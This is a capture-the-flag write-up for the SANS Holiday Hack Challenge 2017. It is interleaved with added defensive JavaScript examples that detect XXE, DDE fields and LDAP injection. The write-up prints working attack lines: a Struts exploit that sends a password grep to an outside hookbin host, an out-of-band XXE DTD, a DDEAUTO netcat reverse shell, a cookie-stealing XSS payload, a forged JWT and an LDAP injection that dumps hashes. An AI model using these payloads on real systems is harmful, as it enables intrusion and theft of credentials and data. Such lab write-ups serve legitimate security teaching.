SANS Holiday Hack Challenge 2017 Solution

  2018-01-01


Hacking the Northpolechristmastown

l2s.northpolechristmastown.com

The Letters to Santa app contains a reference to a development system in an HTML comment.

<!-- Development version -->
<a href="http://dev.northpolechristmastown.com" style="display: none;">Access Development Version</a>

Exploiting Apache Struts

The development interface is based on Apache Struts. The deployed version is vulnerable to CVE-2017-9805. A corresponding exploit script can be found on GitHub.

The script can execute a user-supplied command. For a little feedback, the response is uploaded to hookbin. A hint from Sparkle indicates that the developer might have stored credentials in clear text. With a quick search they can be discovered in the source code of the Letters to Santa app.

$ python cve-2017-9805.py -u https://dev.northpolechristmastown.com/orders.xhtml -c 'echo "test=$(ls -larthR /home/alabaster_snowball | base64 -w0 - && echo "||" && find /opt -name "*.class" -type f -exec grep -i -C2 password {} \; | base64 -w0 - )" | curl -d @- https://hookb.in/Kb8BRDkw'
    final String host = "localhost";
    final String username = "alabaster_snowball";
    final String password = "stream_unhappy_buy_loss";
    String connectionURL = "jdbc:mysql://" + host + ":3306/db?user=;password=";
    Connection connection = null;
    Statement statement = null;

The credentials grant access to the SSH service.

Attacking the Network

After logging in via SSH we are placed in a restricted shell. Alongside some other tools, the system has nmap available. With that we can scan the internal network for other hosts.

Host: 10.142.0.2 (hhc17-l2s-proxy.c.holidayhack2017.internal)   Ports: 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/, 80/open/tcp//http//nginx 1.10.3/, 443/open/tcp//ssl|http//nginx 1.10.3/, 2222/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/    Ignored State: closed (65531)
Host: 10.142.0.3 (hhc17-apache-struts1.c.holidayhack2017.internal)  Ports: 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/, 80/open/tcp//http//nginx 1.10.3/   Ignored State: closed (65533)
Host: 10.142.0.5 (mail.northpolechristmastown.com)  Ports: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)/, 25/open/tcp//smtp//Postfix smtpd/, 80/open/tcp//http//nginx 1.10.3 (Ubuntu)/, 143/open/tcp//imap//Dovecot imapd/, 2525/open/tcp//smtp//Postfix smtpd/, 3000/open/tcp//http//Node.js Express framework/  Ignored State: closed (65529)
Host: 10.142.0.6 (edb.northpolechristmastown.com)   Ports: 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/, 80/open/tcp//http//nginx 1.10.3/, 389/open/tcp//ldap?///, 8080/open/tcp//http//Werkzeug httpd 0.12.2 (Python 2.7.13)/  Ignored State: closed (65531)
Host: 10.142.0.7 (hhc17-smb-server.c.holidayhack2017.internal)  Ports: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Microsoft Windows Server 2008 R2 - 2012 microsoft-ds/, 3389/open/tcp//ssl|ms-wbt-server?///, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 5986/open/tcp//ssl|http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 49666/open/tcp//msrpc//Microsoft Windows RPC/, 49668/open/tcp//msrpc//Microsoft Windows RPC/  Ignored State: filtered (65527)
Host: 10.142.0.8 (hhc17-emi.c.holidayhack2017.internal) Ports: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 3389/open/tcp//ssl|ms-wbt-server?///, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 5986/open/tcp//ssl|http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/ Ignored State: filtered (65531)
Host: 10.142.0.11 (hhc17-apache-struts2.c.holidayhack2017.internal) Ports: 22/open/tcp//tcpwrapped///, 80/open/tcp//http//nginx 1.10.3/, 18281/open/tcp//tcpwrapped///, 44665/open/tcp///// Ignored State: closed (65531)
Host: 10.142.0.13 (eaas.northpolechristmastown.com) Ports: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 3389/open/tcp//ssl|ms-wbt-server?///, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 5986/open/tcp//ssl|http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/ Ignored State: filtered (65531)

10.142.0.7

The system has an SMB service running on the internal network. In order to access that service, a local port forward has to be created.

ssh alabaster_snowball@l2s.northpolechristmastown.com -L :445:10.142.0.7:445

With remote access to the SMB service enabled, the usual tools of the trade can be used.

Connecting to the Samba file server:

smbclient -L localhost -U alabaster_snowball

The server provides a file share with the name FileStor. The easiest way to access the shared drive is to directly mount it.

mount -t cifs -o username=alabaster_snowball,password=stream_unhappy_buy_loss //localhost/FileStor /mnt/foo 

Voilà, Great Book Page 3 is present on the share, along with some other documents.

mail.northpolechristmastown.com

Pepper indicates in a hint that Alabaster implemented his own encryption scheme based on AES256. Implementing your own crypto is always a bad idea. During the initial information gathering phase a cookie.txt file is referenced in robots.txt. The referenced file includes an excerpt of the implemented cookie mechanism.

//FOUND THESE FOR creating and validating cookies. Going to use this in node js
    function cookie_maker(username, callback){
        var key = 'need to put any length key in here';
        //randomly generates a string of 5 characters
        var plaintext = rando_string(5)
        //makes the string into cipher text .... in base64. When decoded this 21 bytes in total length. 16 bytes for IV and 5 byte of random characters
        //Removes equals from output so as not to mess up cookie. decrypt function can account for this without erroring out.
        var ciphertext = aes256.encrypt(key, plaintext).replace(/\=/g,'');
        //Setting the values of the cookie.
        var acookie = ['IOTECHWEBMAIL',JSON.stringify({"name":username, "plaintext":plaintext,  "ciphertext":ciphertext}), { maxAge: 86400000, httpOnly: true, encode: String }]
        return callback(acookie);
    };
    function cookie_checker(req, callback){
        try{
            var key = 'need to put any length key in here';
            //Retrieving the cookie from the request headers and parsing it as JSON
            var thecookie = JSON.parse(req.cookies.IOTECHWEBMAIL);
            //Retrieving the cipher text 
            var ciphertext = thecookie.ciphertext;
            //Retrieving the username
            var username = thecookie.name
            //retrieving the plaintext
            var plaintext = aes256.decrypt(key, ciphertext);
            //If the plaintext and ciphertext are the same, then it means the data was encrypted with the same key
            if (plaintext === thecookie.plaintext) {
                return callback(true, username);
            } else {
                return callback(false, '');
            }
        } catch (e) {
            console.log(e);
            return callback(false, '');
        }
    };

The code makes use of aes256. This library generates a random IV during encryption. Furthermore, the key is hashed with SHA-256 before encryption. Finally, the IV is prepended to the encrypted string. In a hint Pepper asks “What happens if the encrypted string is only 16 bytes long?”. The original Node.js library verifies that the encrypted string is at least 17 bytes long (aes256:67). That might be the hint for gaining access to the mail system.

In this particular example the decrypted string is verified against a user-supplied plaintext. Let’s simply try the 16-byte version.

>>> import base64
>>> IV = b'0000000000000000'
>>> base64.b64encode(IV)
b'MDAwMDAwMDAwMDAwMDAwMA=='

The resulting encoded string might be accepted by the application. Paste it into the request and see whether it works.

Testing the forged cookie.
curl -i -s -k  -X $'GET' \
    -b $'EWA={\"name\":\"alabaster.snowball@northpolechristmastown.com\",\"plaintext\":\"\",\"ciphertext\":\"MDAwMDAwMDAwMDAwMDAwMA==\"}' \
    $'http://mail.northpolechristmastown.com/account.html'

That worked! With access to Alabaster’s mail account we can take a look at his emails. In one message the Great Book Page 4 is referenced and can be downloaded from the system link.

The mail with a reference to the Great Book Page.

Accounts

Some manual research shows that the following accounts send or receive a mail at some point. They might be valuable in a later stage of the story.

alabaster.snowball@northpolechristmastown.com
support@northpolechristmastown.com
admin@northpolechristmastown.com
jessica.claus@northpolechristmastown.com
all@northpolechristmastown.com
mary.sugerplum@northpolechristmastown.com
sparkle.redberry@northpolechristmastown.com
pepper.minstix@northpolechristmastown.com
tarpin.mcjinglehauser@northpolechristmastown.com
wunorse.openslae@northpolechristmastown.com
minty.candycane@northpolechristmastown.com (HTML)
reindeer@northpolechristmastown.com

eaas.northpolechristmastown.com

Sugarplum indicates that the service processes user-supplied XML files. Sugarplum also mentions an article on the SANS Pentesting blog covering XML External Entity Injection. This kind of attack allows arbitrary files to be read and exfiltrated with a corresponding DTD file (see Out-of-band XML External Entity (OOB-XXE)).

In order to exploit the vulnerability the DTD file has to be accessible from the target system. The easiest thing is to create the file on the l2s system that we already have shell access to and open up a webserver.

echo -e "<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?>\n<\x21ENTITY % stolendata SYSTEM \x22file:///c:/greatbook.txt\x22>\n<\x21ENTITY % inception \x22<\x21ENTITY \x26\x23x25; sendit SYSTEM \x27http://10.142.0.3:8123/?%stolendata;\x27>\x22>" | tee evil.dtd
nc -lnvp 8123

After preparing everything we can send the XML with the DTD reference to the target system in order to trigger the XXE injection.

curl -i -s -k  -X $'POST' \
    -H $'Host: eaas.northpolechristmastown.com' \
    -H $'Content-Type: multipart/form-data; boundary=---------------------------199407962719084731591387759358' \
    -H $'Content-Length: 424' -H $'Cookie: ASP.NET_SessionId=nns1453hywr1wkzrwqucc5fa' \
    --data-binary $'-----------------------------199407962719084731591387759358\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"evil.xml\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0d\x0a<?xml version=\"1.0\" encoding=\"utf-8\"?>\x0a<!DOCTYPE demo [\x0a     <!ELEMENT demo ANY >\x0a     <!ENTITY % extentity SYSTEM \"http://10.142.0.3:8123/evil.dtd\">\x0a     %extentity;\x0a     %inception;\x0a     %sendit;\x0a     ]\x0a>\x0d\x0a-----------------------------199407962719084731591387759358--\x0d\x0a' \
    $'http://eaas.northpolechristmastown.com/Home/DisplayXml'

After the request, the target system loads the DTD file. As soon as the definition is processed, the contents of the file named in the DTD are sent to the listener as a GET request.

The DTD is loaded and the file contents is sent.

The file includes a reference to the next page of the Great Book.
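Added example (not from the writeup): a defensive pre-parse gate for an XML upload handler such as /Home/DisplayXml, run here against the payload and DTD reconstructed from the requests above plus a constructed benign document.

```javascript
// Rejects any document that declares a DOCTYPE or an ENTITY. Comments and CDATA
// are stripped first so a "<!DOCTYPE" quoted inside them is not a false positive.
function xmlDeclaresDtd(xml) {
  const stripped = String(xml)
    .replace(/<!--[\s\S]*?-->/g, '')
    .replace(/<!\[CDATA\[[\s\S]*?\]\]>/g, '');
  return /<!DOCTYPE\b/i.test(stripped) || /<!ENTITY\b/i.test(stripped);
}

// Names the indicators for the log line; null when the document is clean.
function describeXxeIndicators(xml) {
  if (!xmlDeclaresDtd(xml)) return null;
  const findings = [];
  if (/<!ENTITY\s+%/i.test(xml)) findings.push('parameter entity');
  if (/SYSTEM\s+["']file:/i.test(xml)) findings.push('SYSTEM file: URI');
  if (/SYSTEM\s+["']https?:/i.test(xml)) findings.push('SYSTEM http(s): URI (out-of-band fetch)');
  if (findings.length === 0) findings.push('DOCTYPE present');
  return findings;
}

// Gate for the upload handler: the document is parsed only when accepted is true.
function gateXmlUpload(xml) {
  const findings = describeXxeIndicators(xml);
  return { accepted: findings === null, findings: findings || [] };
}

// The document the writeup POSTs (reconstructed from the curl body).
const XXE_UPLOAD = `<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "http://10.142.0.3:8123/evil.dtd">
     %extentity;
     %inception;
     %sendit;
     ]
>`;

// The external DTD from the writeup's echo command (reconstructed).
const EVIL_DTD = `<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM 'http://10.142.0.3:8123/?%stolendata;'>">`;

// A benign document of the kind the service is meant to process (constructed).
const BENIGN_UPLOAD = '<?xml version="1.0"?><elf><name>Sugarplum Mary</name><!-- <!DOCTYPE in a comment --></elf>';

console.log('upload :', gateXmlUpload(XXE_UPLOAD));
console.log('dtd    :', describeXxeIndicators(EVIL_DTD));
console.log('benign :', gateXmlUpload(BENIGN_UPLOAD));
```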

emi.northpolechristmastown.com

The hints from Shinny indicate that the target can only be attacked via a client-side attack. Looking through Alabaster’s mailbox shows that he is looking for a cookie recipe. He is probably waiting for a mail whose text includes “More recipies for gingerbread cookies”.

One mail on the mail server mentions a document that is used to open the calculator for Wunorse. The corresponding file is present on the Samba file share accessed earlier. The Word document uses a DDEAUTO field to open the calculator. To exploit this, the command line has to be adjusted. Luckily, another mail mentions that Alabaster installed nc.exe on the machine. This simplifies the whole process quite a bit, as we can probably open a reverse shell with netcat.

As Word was not available to prepare the payload document, another method was used. A .docx file is basically a zip archive of XML files that can be edited manually. The following commands adjust the payload.

mkdir dde
cd dde/
unzip "../MEMO - Calculator Access for Wunorse.docx"
# edit the document XML (word/document.xml) and replace the DDEAUTO field with the following command line
DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc -nv 10.142.0.3 8123 -e cmd.exe"
zip -r ../rezipped.docx *

After the payload document is ready, the last preparation step is to start a listener to receive the reverse shell. Once everything is in place, upload the payload document and send the phishing mail to poor Alabaster.

curl -i -s -k  -X $'POST' \
    -H $'Host: mail.northpolechristmastown.com' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 575' -H $'Cookie: EWA={\"name\":\"jessica.claus@northpolechristmastown.com\",\"plaintext\":\"\",\"ciphertext\":\"MDAwMDAwMDAwMDAwMDAwMA==\"}' \
    -b $'EWA={\"name\":\"jessica.claus@northpolechristmastown.com\",\"plaintext\":\"\",\"ciphertext\":\"MDAwMDAwMDAwMDAwMDAwMA==\"}' \
    --data-binary $'from_email=jessica.claus%40northpolechristmastown.com&to_email=alabaster.snowball%40northpolechristmastown.com&subject_email=More+recipies+for+gingerbread+cookies&message_email=54686520626573742072656369706520666f722067696e676572627265616420636f6f6b696520796f752063616e206765742e2041545441434845442046494c4520444f574e4c4f414420484552453a20687474703a2f2f6d61696c2e6e6f727468706f6c656368726973746d6173746f776e2e636f6d2f6174746163686d656e74732f6273554b5548594c6c3054793730735a626d726539627457674e6c7641475748374d316f365263453375697252366f6b43465f5f72657a69707065642e646f63780a20' \
    $'http://mail.northpolechristmastown.com/api.js'

After a few moments the system should connect back to the listener.

The target system opens a reverse netcat shell to the attacking machine.
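Added example (not from the writeup): a detector for DDE and DDEAUTO fields in a .docx's word/document.xml, the file edited by hand above; the two document fragments are constructed to model the memo and are not the real file.

```javascript
// Word stores a field instruction either as the w:instr attribute of a
// w:fldSimple element or as the text of w:instrText runs between fldChar
// "begin" and "end" markers; both forms are covered here.

function decodeXmlEntities(s) {
  return s.replace(/&quot;/g, '"').replace(/&apos;/g, "'").replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Returns every field instruction in the document XML, simple and complex alike.
function extractFieldInstructions(documentXml) {
  const fields = [];
  const simple = /<w:fldSimple\b[^>]*\bw:instr="([^"]*)"/g;
  for (let m; (m = simple.exec(documentXml)) !== null;) fields.push(decodeXmlEntities(m[1]));
  // Complex fields: join all w:instrText runs between a "begin" and an "end" fldChar.
  const tokens = /<w:fldChar\b[^>]*?w:fldCharType="(begin|end)"[^>]*>|<w:instrText\b[^>]*>([\s\S]*?)<\/w:instrText>/g;
  let current = null;
  for (let m; (m = tokens.exec(documentXml)) !== null;) {
    if (m[1] === 'begin') current = '';
    else if (m[1] === 'end') { if (current !== null) fields.push(decodeXmlEntities(current)); current = null; }
    else if (current !== null) current += m[2];
  }
  return fields.map((f) => f.trim());
}

// Flags DDE and DDEAUTO fields and pulls out the program and arguments they carry.
function findDdeFields(documentXml) {
  const dde = /^(DDEAUTO|DDE)\s+(\S+)\s*([\s\S]*)$/i;
  return extractFieldInstructions(documentXml)
    .map((f) => dde.exec(f))
    .filter(Boolean)
    .map((m) => ({ type: m[1].toUpperCase(), program: m[2], args: m[3].trim() }));
}

// Constructed document.xml fragments: one modelled on the calculator memo
// (complex field split across two runs), one with a harmless DATE field.
const MEMO_CALC = '<w:document><w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>' +
  '<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe </w:instrText></w:r>' +
  '<w:r><w:instrText xml:space="preserve">"/k calc.exe" </w:instrText></w:r>' +
  '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>';
const MEMO_CLEAN = '<w:document><w:body><w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; ">' +
  '<w:r><w:t>24 December 2017</w:t></w:r></w:fldSimple></w:p></w:body></w:document>';

console.log('memo  :', findDdeFields(MEMO_CALC));
console.log('clean :', findDdeFields(MEMO_CLEAN));
```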

Download Book Page

The goal on the system is to download another page from the Great Book. One easy solution is to start a web server with Python on the victim machine from the root directory.

C:\PROGRA~1\Python36\python.exe -m http.server 8124

The page is then available at the following URI.

http://10.142.0.8:8124/GreatBookPage7.pdf

Information Gathering

The system is an up-to-date Windows 10 virtual machine.

OS Name:                   Microsoft Windows Server 2016 Datacenter
OS Version:                10.0.14393 N/A Build 14393

Commands are probably executed via the following python script. The file cannot be opened by the current user.

C:\PROGRA~1\WindowsGrabber\alabaster_snowball.py

The same directory also contains another file, ‘execute.ps1’.

function exec {
    $the_file = '.\file.txt'
    foreach($line in Get-Content $the_file) {
        $job  = Start-Job -ScriptBlock {param($p) iex($p)} -Arg $line
    }
    Clear-Content $the_file
}

while ($true) {
    exec
    Start-Sleep -s 10
}

The purpose of this file can only be speculated about.

edb.northpolechristmastown.com

Information gathering shows that the elf database is based on Materialize CSS. Alabaster’s default credentials do not grant access to the portal. In the source code the following JavaScript snippet provides some hints regarding the authorization.

token = localStorage.getItem("np-auth");
if (token) {
    user_json = JSON.parse(atob(token.split('.')[1]))

Here a token is stored in localStorage. According to a hint from Wunorse, the password reset might be vulnerable to an XSS vulnerability.


Testing the password request shows that script tags are filtered. This confirms that Alabaster implemented some kind of security filter, as Wunorse also indicated.

Steal Cookies and localStorage

After some tweaking, the following payload sends cookies and localStorage back to the attacker.

<img src=x onerror=this.src='http://10.142.0.3:8124/foo.png?cookie='+document.cookie+'&foo='+btoa(JSON.stringify(localStorage))>

The request in Burp Repeater.

curl -i -s -k  -X $'POST' \
    -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' \
    --data-binary $'uid=alabaster.snowball&email=alabaster.snowball%40northpolechristmastown.com&message=testasdf+%3Cimg+src%3Dx+onerror=this.src=\'http%3A%2F%2F10.142.0.11%3A8123%2Ffoo.png?cookie=\'%2bdocument.cookie%2b\'%26foo=\'%2bbtoa(JSON.stringify(localStorage))%2b\'%26bar=\'%3E' \
    $'http://edb.northpolechristmastown.com/service'

After a few moments the XSS is triggered by another user and the listening server receives a connection with the cookies and localStorage.

The cookies are sent back to the attacking machine.

The following values are sent back:

SESSION=hxxer50N2e1C2AFt5X06
{"np-auth":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I"}

The SESSION cookie does not grant any access to the application. The np-auth token is formatted like a JWT: three base64url sections separated by two dots. The first section is the header, which describes the signature algorithm.

{"alg":"HS256","typ":"JWT"}

The middle part includes the base64 encoded payload for the token.

{"dept":"Engineering","ou":"elf","expires":"2017-08-16 12:00:47.248093+00:00","uid":"alabaster.snowball"}

The token is already expired and can therefore not be utilized to access the application. To gain access a valid token probably has to be forged.

Discover key for JWT Token

The JWT is secured with an HMAC algorithm. The easiest option would be to replace ‘HS256’ with ‘none’ to fool the library. Unfortunately, that did not work. The next viable option is to test for password reuse or weak passwords. John the Ripper supports JWT tokens and might be able to do the job. The following command tries all password lists from SecLists.

for FILE in /opt/SecLists/Passwords/*.txt; do ~/Tools/JohnTheRipper/run/john --fork=4 --wordlist="${FILE}" jwt.token; done
~/Tools/JohnTheRipper/run/john jwt.token --show=left

None of the wordlists contained the secret for the hash. As a fallback, john can try to brute-force the secret.

john jwt.token

After a few minutes that did actually yield the secret for the HMAC.

John the ripper cracked the secret with a simple brute-force attack.

With the secret key we can finally forge a valid JWT token. The following python snippet creates a token that grants access to the application.

import jwt
key='3lv3s'
encoded=jwt.encode({'dept': 'administrators',
 'expires': '2018-08-16 12:00:47.248093+00:00',
 'ou': 'human', 'uid': 'santa.claus'}, key, algorithm='HS256')

The resulting JWT token has to be written to the localStorage as np-auth. With the token in localStorage the application automatically logs the user in.

Successfully logged in with the new JWT token.

Santa’s Letter

Inside the application we are able to query the elf database. Access to a restricted area is only granted by providing a password. In the initial stage an LDAP description file was discovered on the web server. In this file the different fields of the objects are listed, including userPassword.

#LDAP LDIF TEMPLATE

dn: dc=com
dc: com
objectClass: dcObject

dn: dc=northpolechristmastown,dc=com
dc: northpolechristmastown
objectClass: dcObject
objectClass: organization

dn: ou=human,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: human

dn: ou=elf,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: elf

dn: ou=reindeer,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: reindeer

dn: cn= ,ou= ,dc=northpolechristmastown,dc=com
objectClass: addressbookPerson
cn: 
sn: 
gn: 
profilePath: /path/to/users/profile/image
uid: 
ou: 
department: 
mail: 
telephoneNumber: 
street:
postOfficeBox: 
postalCode: 
postalAddress: 
st: 
l: 
c: 
facsimileTelephoneNumber: 
description: 
userPassword: 

The path is laid out: we have to dump the database.

Database Injection

Wunorse mentioned a recent article about injections in similar databases; the SANS Pentest Blog has a recent post about LDAP injection. By manually adding the respective field name to the attributes in the POST query, the password hash is returned by the server. The next step is to query all objects via LDAP injection. After some tweaking, the following request returns all the objects from the database.

The query returns all user objects together with their password hashes.

curl -i -s -k  -X $'POST' \
    -H $'Host: edb.northpolechristmastown.com' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'np-auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkZXB0IjoiYWRtaW5pc3RyYXRvcnMiLCJleHBpcmVzIjoiMjAxOC0wOC0xNiAxMjowMDo0Ny4yNDgwOTMrMDA6MDAiLCJvdSI6Imh1bWFuIiwidWlkIjoic2FudGEuY2xhdXMifQ.VNrdoutFDu4OwfPRXHVWL00r6Q-WJQG9qVoUznSSJ40' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 197' -H $'Cookie: SESSION=yN38l5ksth22we4cue7a' \
    -b $'SESSION=yN38l5ksth22we4cue7a' \
    --data-binary $'name=))(departmen=it)(|(cn=&isElf=True&attributes=profilePath%2Cgn%2Csn%2Cmail%2Cuid%2Cdepartment%2CtelephoneNumber%2Cdescription%2CuserPassword,street,postOfficeBox,postalCode,postalAddress,st,l,c' \
    $'http://edb.northpolechristmastown.com/search'

Unfortunately, the passwords are not in clear text but rather hashed. Release the cracker!
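Added example (not from the writeup; edb's server code is not shown, so the filter shape is an assumption): how the name value from the request above reshapes a concatenated LDAP filter, the RFC 4515 escaping that prevents it, and an attribute allow-list that keeps userPassword out of search results.

```javascript
// Escape one value for use inside an LDAP search filter (RFC 4515, section 3):
// the characters that carry structure become \XX hex escapes.
function escapeLdapFilterValue(value) {
  return String(value).replace(/[\\*()\0]/g, (ch) => '\\' + ch.charCodeAt(0).toString(16).padStart(2, '0'));
}

// ASSUMED vulnerable builder: the user's name goes straight into the filter.
// The leading "))" of the injected value closes the cn term and the enclosing
// AND, leaving "(&(ou=elf)(cn=*))" as the first complete filter, which matches
// every object in the OU; the trailing "(|(cn=" swallows the template's own
// "*))" so the string as a whole stays balanced.
function buildFilterUnsafe(name, isElf) {
  return `(&(ou=${isElf ? 'elf' : 'human'})(cn=*${name}*))`;
}

// Hardened builder: the same shape, but the value is escaped first.
function buildFilterSafe(name, isElf) {
  return `(&(ou=${isElf ? 'elf' : 'human'})(cn=*${escapeLdapFilterValue(name)}*))`;
}

// Splits a filter string into its first complete parenthesised expression and
// whatever follows. A well-formed filter has no remainder; the injected value
// leaves one, which is how it reshapes the query.
function splitLeadingFilter(filter) {
  let depth = 0;
  for (let i = 0; i < filter.length; i++) {
    if (filter[i] === '(') depth++;
    else if (filter[i] === ')') {
      depth--;
      if (depth === 0) return { head: filter.slice(0, i + 1), remainder: filter.slice(i + 1) };
      if (depth < 0) break;
    }
  }
  return { head: null, remainder: filter };
}

// Allow-list for the attributes a caller may request. The writeup's request
// added userPassword to the list; a search endpoint must never return it.
const SEARCH_ATTRS_ALLOWED = new Set(['profilePath', 'gn', 'sn', 'mail', 'uid', 'department', 'telephoneNumber', 'description']);
function selectAttributes(requested) {
  const wanted = String(requested).split(',').map((a) => a.trim()).filter(Boolean);
  return {
    allowed: wanted.filter((a) => SEARCH_ATTRS_ALLOWED.has(a)),
    rejected: wanted.filter((a) => !SEARCH_ATTRS_ALLOWED.has(a)),
  };
}

// Values from the writeup's curl request (attribute list URL-decoded).
const INJECTED_NAME = '))(departmen=it)(|(cn=';
const INJECTED_ATTRS = 'profilePath,gn,sn,mail,uid,department,telephoneNumber,description,userPassword,street,postOfficeBox,postalCode,postalAddress,st,l,c';

console.log('unsafe filter :', buildFilterUnsafe(INJECTED_NAME, true));
console.log('safe filter   :', buildFilterSafe(INJECTED_NAME, true));
console.log('attributes    :', selectAttributes(INJECTED_ATTRS));
```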

Cracking the Password Hashes

The passwords are hashed using unsalted MD5. First, John the Ripper is put to work. While john is working on the hashes, some of them might already be listed in public hash lookup databases.

for FILE in /opt/SecLists/Passwords/*.txt; do ~/Tools/JohnTheRipper/run/john --fork=4 --wordlist="${FILE}" --format=Raw-MD5 userpass.txt; done
~/Tools/JohnTheRipper/run/john --format=Raw-MD5 userpass.txt --show=left

Of the twelve hashes only one is listed online, cdabeb96b508f25f97ab0f162eac5a04.

cdabeb96b508f25f97ab0f162eac5a04:1iwantacookie

While writing this up, a different hash for Santa came back from edb.

d8b4c05a35b0513f302a85c409b4aab3:001cookielips001

This is the password for Santa’s account and grants access through the last door. The letter to Santa is behind the password request.

The hidden letter to santa.

Naughty and Nice List

Santa’s naughty and nice list can be downloaded from the Samba share. The list includes the names and the verdict for each person, but no background information for the verdict. The North Pole Police Department lists the background information on its website.

nppd.northpolechristmastown.com

In order to process the data properly, the whole database has to be downloaded. The JSON database can be downloaded directly from the command line.

curl -i -s -k  -X $'GET' \
    $'https://nppd.northpolechristmastown.com/infractions?query=severity>0&json=1'

With the background information at hand, the next step is to combine the two data sets. Python to the rescue.

Analysis

First of all, the nppd data is structured around the name. With this format the Naughty and Nice List can easily be verified.

The first question is to figure out the number of infractions required to be called ‘Naughty’. By counting the infractions for each name on the naughty list, this question is easily answered: the 4th infraction results in a ‘naughty’ verdict.

The next question is to find out the munchkin moles with the nppd data. According to a hint from Minty two munchkin moles got into a fight with “pulling hair, and throwing rocks […] a super atomic wedgie”. The intersection of the first two infractions yields a list of six names.
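Added example (not from the writeup): both analyses above over a constructed miniature of the NPPD data and the Naughty and Nice List; the record fields name, title and verdict are assumptions, since the real JSON schema is not shown, and all names are made up.

```javascript
// Constructed NPPD-style records: one object per infraction (field names assumed).
const NPPD_INFRACTIONS = [
  { name: 'Holly Example', title: 'Aggravated pulling of hair' },
  { name: 'Holly Example', title: 'Throwing rocks (at people)' },
  { name: 'Holly Example', title: 'Giving super atomic wedgies' },
  { name: 'Holly Example', title: 'Naughty words' },
  { name: 'Ivy Example', title: 'Aggravated pulling of hair' },
  { name: 'Ivy Example', title: 'Throwing rocks (at people)' },
  { name: 'Ivy Example', title: 'Playing with matches' },
  { name: 'Ivy Example', title: 'Naughty words' },
  { name: 'Ivy Example', title: 'Refusing to eat vegetables' },
  { name: 'Rudy Example', title: 'Aggravated pulling of hair' },
  { name: 'Rudy Example', title: 'Naughty words' },
  { name: 'Rudy Example', title: 'Refusing to eat vegetables' },
  { name: 'Noel Example', title: 'Throwing rocks (at people)' },
];

// Constructed slice of the Naughty and Nice List (name and verdict only, as in the writeup).
const NAUGHTY_NICE = [
  { name: 'Holly Example', verdict: 'Naughty' },
  { name: 'Ivy Example', verdict: 'Naughty' },
  { name: 'Rudy Example', verdict: 'Nice' },
  { name: 'Noel Example', verdict: 'Nice' },
  { name: 'Fern Example', verdict: 'Nice' },
];

function countInfractions(infractions) {
  const counts = new Map();
  for (const { name } of infractions) counts.set(name, (counts.get(name) || 0) + 1);
  return counts;
}

// Step 1: the smallest infraction count among "Naughty" names is the threshold;
// the result is only consistent if every "Nice" name stays below it.
function naughtyThreshold(list, infractions) {
  const counts = countInfractions(infractions);
  const of = (n) => counts.get(n) || 0;
  const naughty = list.filter((e) => e.verdict === 'Naughty').map((e) => of(e.name));
  const nice = list.filter((e) => e.verdict === 'Nice').map((e) => of(e.name));
  const threshold = Math.min(...naughty);
  return { threshold, consistent: nice.every((c) => c < threshold) };
}

// Step 2: names charged with every one of the given infraction types (the
// writeup intersects hair pulling and rock throwing to find the moles).
function namesWithAll(infractions, patterns) {
  const byName = new Map();
  for (const { name, title } of infractions) {
    if (!byName.has(name)) byName.set(name, []);
    byName.get(name).push(title);
  }
  return [...byName]
    .filter(([, titles]) => patterns.every((p) => titles.some((t) => p.test(t))))
    .map(([name]) => name)
    .sort();
}

console.log(naughtyThreshold(NAUGHTY_NICE, NPPD_INFRACTIONS));
console.log(namesWithAll(NPPD_INFRACTIONS, [/pulling of hair/i, /throwing rocks/i]));
```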

Questions

